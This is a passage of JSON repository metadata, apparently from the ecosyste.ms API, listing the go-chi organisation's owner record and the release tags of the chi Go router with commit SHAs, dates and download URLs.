ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.4/manifests"},{"name":"v3.3.3","sha":"b5294d10673813fac8558e7f47242bc9e61b4c25","kind":"commit","published_at":"2018-08-27T20:34:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.3","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"e83ac2304db3c50cf03d96a2fcd39009d458bc35","kind":"commit","published_at":"2017-12-22T16:11:33.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.2","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.2/manifests"},{"name":"v3.3.1","sha":"687d2792aedd8e8ac3bbd8592cf55b91d7ea8ce9","kind":"commit","published_at":"2017-11-20T15:19:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"f7c66f685bcab06bcce78ac212c5f3553c063d19","kind":"commit","published_at":"2017-10-10T22:11:38.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.0/manifests"},{"name":"v3.2.1","sha":"04ec7fc4179604b2390947258f9143eaae23b596","kind":"commit","published_at":"2017-09-01T02:07:29.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.2.1","html_url":"https://github.com/go-chi/chi/re